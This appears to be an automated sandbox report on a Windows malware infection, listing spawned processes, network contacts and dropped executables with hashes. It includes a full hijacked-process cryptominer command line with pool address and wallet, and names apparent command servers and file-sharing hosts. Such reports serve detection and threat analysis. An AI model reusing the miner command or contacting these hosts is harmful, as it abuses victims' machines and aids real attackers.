"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,9364587754675404049,11013315645749529256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3344 -ip 3344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 792

C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -s

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 8

C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -i

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RBvfugTGdvfZCHCgvSoHZdsYt2u1JwYhUP.RIG_CPU -p x --cpu-max-threads-hint=50

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.231:80 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.231:80 tcp
FI 77.91.124.82:19071 tcp
US 8.8.8.8:53 112.208.253.8.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.61:80 77.91.68.61 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 61.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
FI 77.91.68.78:80 77.91.68.78 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 78.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
MD 176.123.9.85:16482 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
NL 141.98.6.38:39001 tcp
US 8.8.8.8:53 85.9.123.176.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 38.6.98.141.in-addr.arpa udp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
FI 77.91.124.82:19071 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
US 165.227.182.82:3333 rx.unmineable.com tcp
US 8.8.8.8:53 82.182.227.165.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 13.73.50.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

MD5 f1518566c4c13ed2b8fa03a371d58236
SHA1 32b2404b4c254fe03d3cc2380da6fdbe9969daf1
SHA256 b9cf317745a4cb4c4c7a6a0386e71601e2730b381e8aad5542b879236709d3f8
SHA512 daf82ff5af64149f739c16f8ce98885eb799666600b460e640dd8cebfd6a08b53f48ae125f349cf874fd59a386406ba0d08813cf89bad7a7e7465f472f29d311

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

MD5 f1518566c4c13ed2b8fa03a371d58236
SHA1 32b2404b4c254fe03d3cc2380da6fdbe9969daf1
SHA256 b9cf317745a4cb4c4c7a6a0386e71601e2730b381e8aad5542b879236709d3f8
SHA512 daf82ff5af64149f739c16f8ce98885eb799666600b460e640dd8cebfd6a08b53f48ae125f349cf874fd59a386406ba0d08813cf89bad7a7e7465f472f29d311

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

MD5 554f3c1cf7539933dde049c3ea8c9f4e
SHA1 262970416d521be21e6466a404e0579d68f32db4
SHA256 c80535bf0713f5311cb705fcf1f766560d22b2c0e9ab6189f285693b45275a2e
SHA512 eb465d8b64fe48740f20a0e7164b088e383f2131bc2d4b8511835da31afef1dc53cc6af04c5fc5653be6db3ac2d8bf713847edc84437232a90a9dadff1976a0a

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

MD5 554f3c1cf7539933dde049c3ea8c9f4e
SHA1 262970416d521be21e6466a404e0579d68f32db4
SHA256 c80535bf0713f5311cb705fcf1f766560d22b2c0e9ab6189f285693b45275a2e
SHA512 eb465d8b64fe48740f20a0e7164b088e383f2131bc2d4b8511835da31afef1dc53cc6af04c5fc5653be6db3ac2d8bf713847edc84437232a90a9dadff1976a0a

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

memory/2232-21-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2232-22-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe

MD5 f4de74c0ef559115f6ec615c309d3dd7
SHA1 bfa11657b202fc092ce2cebbfa538573580d2897
SHA256 8f4abd0c367867de3f5ef61eb86575381124eff1f149e1c884a9262e6e6eaa15
SHA512 9e3521a1bf942a65c9935c74a91e7dc26eeb427aecc62a0ccef13c276b70cc0aede7a81fb60e021bcd5b1e711a1c8d00692f72d1d0ee66c82c755fa75c932043

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8626230.exe

MD5 f4de74c0ef559115f6ec615c309d3dd7
SHA1 bfa11657b202fc092ce2cebbfa538573580d2897
SHA256 8f4abd0c367867de3f5ef61eb86575381124eff1f149e1c884a9262e6e6eaa15
SHA512 9e3521a1bf942a65c9935c74a91e7dc26eeb427aecc62a0ccef13c276b70cc0aede7a81fb60e021bcd5b1e711a1c8d00692f72d1d0ee66c82c755fa75c932043

memory/2708-26-0x0000000000400000-0x0000000000430000-memory.dmp

memory/2708-27-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/2708-28-0x0000000005230000-0x0000000005236000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe

MD5 1acd31a669532ea232ff86d8c999fb64
SHA1 37f28b118568da7159f42535866ae146c2a57449
SHA256 d62d8a763bd29aa83182ad13a2abea855b5b0e6e3732e07eb5d723a4ef666171
SHA512 4b6def2ab52e41d4632af6b19ec83c39b080754e6a5f03a88a7d09cb722446cca6f19344f73d8b5714ecc461ce549827a04a9de7b3ab5c17dcd3ef9a8e06269e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3353339.exe

MD5 1acd31a669532ea232ff86d8c999fb64
SHA1 37f28b118568da7159f42535866ae146c2a57449
SHA256 d62d8a763bd29aa83182ad13a2abea855b5b0e6e3732e07eb5d723a4ef666171
SHA512 4b6def2ab52e41d4632af6b19ec83c39b080754e6a5f03a88a7d09cb722446cca6f19344f73d8b5714ecc461ce549827a04a9de7b3ab5c17dcd3ef9a8e06269e

memory/4176-32-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2708-34-0x0000000005900000-0x0000000005F18000-memory.dmp

memory/4176-33-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/2708-35-0x00000000053F0000-0x00000000054FA000-memory.dmp

memory/2708-37-0x0000000005290000-0x00000000052A2000-memory.dmp

memory/2708-36-0x00000000052D0000-0x00000000052E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e5928733.exe

MD5 4045773acdb8bed1c8c9a74882c0df80
SHA1 0fa40e316ad4fd1c25302f51582bf127e0f89ad5
SHA256 c05c5d0068813423ffe38f6b54f5e12658221e8d191ac9922271b707ba3a01eb
SHA512 31964588a57454bcdf4b03beefd17250e792a6191a7785982294832b2447282d859581a9a3c9ba8aeaedfb2adcf8a17b0a46b040a69f901cebee898f2dc1d9eb

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e5928733.exe

MD5 4045773acdb8bed1c8c9a74882c0df80
SHA1 0fa40e316ad4fd1c25302f51582bf127e0f89ad5
SHA256 c05c5d0068813423ffe38f6b54f5e12658221e8d191ac9922271b707ba3a01eb
SHA512 31964588a57454bcdf4b03beefd17250e792a6191a7785982294832b2447282d859581a9a3c9ba8aeaedfb2adcf8a17b0a46b040a69f901cebee898f2dc1d9eb

memory/2708-41-0x0000000005320000-0x000000000535C000-memory.dmp

memory/3180-42-0x0000000002DD0000-0x0000000002DE6000-memory.dmp

memory/2232-44-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2708-46-0x0000000005360000-0x00000000053AC000-memory.dmp

memory/2708-47-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/4176-48-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/4176-50-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/2708-51-0x00000000052D0000-0x00000000052E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\847D.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6351be8b63227413881e5dfb033459cc
SHA1 f24489be1e693dc22d6aac7edd692833c623d502
SHA256 e24cda01850900bdb3a4ae5f590a76565664d7689026c146eb96bcd197dac88b
SHA512 66e249488a2f9aa020834f3deca7e4662574dcab0cbb684f21f295f46d71b11f9494b075288189d9df29e4f3414d4b86c27bf8823005d400a5946d7b477f0aef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 16c2a9f4b2e1386aab0e353614a63f0d
SHA1 6edd3be593b653857e579cbd3db7aa7e1df3e30f
SHA256 0f7c58a653ae1f3999627721bad03793edc1e9d12e8f5253c30b61b8478f5c81
SHA512 aba1ed22c7b9ae1942d69a7cd7a618597300ae5c56be88187ddec6227df056f81c1d9217778d87fa8c36402bce7275d707118ff62d3a241297738da434556e06

\??\pipe\LOCAL\crashpad_4216_ONNQELSPPZOIVSLW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_1120_JNYDAOIVEGIXSFEW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\8C3E.exe

MD5 6b254caca548f0be01842a0c4bd4c649
SHA1 79bbeed18d08c3010e8954f6d5c9f52967dcc32e
SHA256 01a7afff3220c1a442e3b8bc41dbf4036e9c223f9aab374265d9beae0709e434
SHA512 b69f8c71f2b71268150cc74e8e842b6526e87c5e944d163bb3def85cc919428c249a733ca9bbefc4cf4b80a8dbf6961b8e6f0333194713faf10551b8eb97d3ff

C:\Users\Admin\AppData\Local\Temp\8C3E.exe

MD5 6b254caca548f0be01842a0c4bd4c649
SHA1 79bbeed18d08c3010e8954f6d5c9f52967dcc32e
SHA256 01a7afff3220c1a442e3b8bc41dbf4036e9c223f9aab374265d9beae0709e434
SHA512 b69f8c71f2b71268150cc74e8e842b6526e87c5e944d163bb3def85cc919428c249a733ca9bbefc4cf4b80a8dbf6961b8e6f0333194713faf10551b8eb97d3ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c2c6f00f930237ffdd2547aad0bd4ceb
SHA1 ffdaf2e30c5c74be7f541ccd043b6c5c70a60ab7
SHA256 ffa3b54d1eb86d9ba8159a165e7e8095b5be54bd898bc9c22f8a0b8b05dd5193
SHA512 6473e268a70fcbdbfb4896dccbf44afa3a4e39c93c79567df50ef9f36e949ecc8a1c6aabc519c9ea31c7c5c182f23be7a954cdac32b244150c3c9ae311ee756e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9fa3b566574f43f233123d96b5d59e06
SHA1 41bbb780cf907bfcec53cbdb3e6337a07093fac0
SHA256 b92f56f55d38aa1dbaca02a0ebc21070e09c59f89d471d4a9072516f10719886
SHA512 ccfdb4d01c01ce6d769e49a6084c73c7c76f94174afac6869e86c0f5b95d3d73b2a5fe79177559012d01862f718d33e89351453ebce81a17d8ea62f98e2a4235

C:\Users\Admin\AppData\Local\Temp\8FD9.exe

MD5 ef11a166e73f258d4159c1904485623c
SHA1 bc1f4c685f4ec4f617f79e3f3f8c82564cccfc4e
SHA256 dc24474e1211ef4554c63f4d70380cc71063466c3d0a07e1a4d0726e0f587747
SHA512 2db0b963f92ce1f0b965011f250361e0951702267e8502a7648a726c407941e6b95abb360545e61ff7914c66258ee33a86766b877da3ad4603d68901fbd95708

C:\Users\Admin\AppData\Local\Temp\8FD9.exe

MD5 ef11a166e73f258d4159c1904485623c
SHA1 bc1f4c685f4ec4f617f79e3f3f8c82564cccfc4e
SHA256 dc24474e1211ef4554c63f4d70380cc71063466c3d0a07e1a4d0726e0f587747
SHA512 2db0b963f92ce1f0b965011f250361e0951702267e8502a7648a726c407941e6b95abb360545e61ff7914c66258ee33a86766b877da3ad4603d68901fbd95708

C:\Users\Admin\AppData\Local\Temp\ss41.exe

MD5 2527628a2b3b4343c614e48132ab3edb
SHA1 0d60f573a21251dcfd61d28a7a0566dc29d38aa6
SHA256 04ce968bedd7f177b35e130887aee1ec599e3d7b72f45f370f3ade343950b6bf
SHA512 416b0990011e24ba2d03d3859b63a2b2ba4494aafeb6cd27efd335055ab063bd677902b74faa1162493dae827a96ef768b957f8a407d25902c067a13a8718dd2

memory/1324-133-0x00000209814A0000-0x0000020981586000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 f0ba7739cc07608c54312e79abaf9ece
SHA1 38b075b2e04bc8eee78b89766c1cede5ad889a7e
SHA256 9e96d77f013c6ca17f641c947be11a1bb8921937ed79ec98c4b49ef4c641ae5f
SHA512 15da0554fdd9fb80325883344349b3b4d7b5a612c13eecb810c488621f805ab59c159a54c526ae92f1b81064949bf408f9f2ad07a4c8eda424b2a8f89ea6e165

C:\Users\Admin\AppData\Local\Temp\ss41.exe

MD5 2527628a2b3b4343c614e48132ab3edb
SHA1 0d60f573a21251dcfd61d28a7a0566dc29d38aa6
SHA256 04ce968bedd7f177b35e130887aee1ec599e3d7b72f45f370f3ade343950b6bf
SHA512 416b0990011e24ba2d03d3859b63a2b2ba4494aafeb6cd27efd335055ab063bd677902b74faa1162493dae827a96ef768b957f8a407d25902c067a13a8718dd2

memory/1324-134-0x00007FFA50070000-0x00007FFA50B31000-memory.dmp

memory/1324-145-0x000002099B9C0000-0x000002099BAA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ss41.exe

MD5 2527628a2b3b4343c614e48132ab3edb
SHA1 0d60f573a21251dcfd61d28a7a0566dc29d38aa6
SHA256 04ce968bedd7f177b35e130887aee1ec599e3d7b72f45f370f3ade343950b6bf
SHA512 416b0990011e24ba2d03d3859b63a2b2ba4494aafeb6cd27efd335055ab063bd677902b74faa1162493dae827a96ef768b957f8a407d25902c067a13a8718dd2

memory/3340-147-0x00007FF7F8C80000-0x00007FF7F8D59000-memory.dmp

memory/1324-152-0x000002099BAA0000-0x000002099BAB0000-memory.dmp

memory/1324-151-0x000002099BAB0000-0x000002099BB80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 f0ba7739cc07608c54312e79abaf9ece
SHA1 38b075b2e04bc8eee78b89766c1cede5ad889a7e
SHA256 9e96d77f013c6ca17f641c947be11a1bb8921937ed79ec98c4b49ef4c641ae5f
SHA512 15da0554fdd9fb80325883344349b3b4d7b5a612c13eecb810c488621f805ab59c159a54c526ae92f1b81064949bf408f9f2ad07a4c8eda424b2a8f89ea6e165

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\kos1.exe

MD5 85b698363e74ba3c08fc16297ddc284e
SHA1 171cfea4a82a7365b241f16aebdb2aad29f4f7c0
SHA256 78efcbb0c6eb6a4c76c036adc65154b8ff028849f79d508e45babfb527cb7cfe
SHA512 7e4816c43e0addba088709948e8aedc9e39d6802c74a75cfbc2a0e739b44c5b5eef2bb2453b7032c758b0bdb38e4e7a598aa29be015796361b81d7f9e8027796

memory/4512-193-0x0000000000B40000-0x0000000000CB4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos1.exe

MD5 85b698363e74ba3c08fc16297ddc284e
SHA1 171cfea4a82a7365b241f16aebdb2aad29f4f7c0
SHA256 78efcbb0c6eb6a4c76c036adc65154b8ff028849f79d508e45babfb527cb7cfe
SHA512 7e4816c43e0addba088709948e8aedc9e39d6802c74a75cfbc2a0e739b44c5b5eef2bb2453b7032c758b0bdb38e4e7a598aa29be015796361b81d7f9e8027796

memory/2220-191-0x0000000000E30000-0x0000000001008000-memory.dmp

memory/4512-197-0x0000000073C20000-0x00000000743D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9604.exe

MD5 52c2f13a9fa292d1f32439dde355ff71
SHA1 03a9aa82a8070de26b9a347cfbd4090fd239f8df
SHA256 020c6da8f2bbd3a3f15dcbc8808255c2650df37f2b499b680e69d9e3cb1c1316
SHA512 097d5415d7ed0ebb6b6f89cc38b29471a47ef99df79e7c6b0b01592174dfb115abdf496126bb7177527c252803bcc53a31b8c40d2f1aa65fae4331b5afe9e36a

C:\Users\Admin\AppData\Local\Temp\9604.exe

MD5 52c2f13a9fa292d1f32439dde355ff71
SHA1 03a9aa82a8070de26b9a347cfbd4090fd239f8df
SHA256 020c6da8f2bbd3a3f15dcbc8808255c2650df37f2b499b680e69d9e3cb1c1316
SHA512 097d5415d7ed0ebb6b6f89cc38b29471a47ef99df79e7c6b0b01592174dfb115abdf496126bb7177527c252803bcc53a31b8c40d2f1aa65fae4331b5afe9e36a

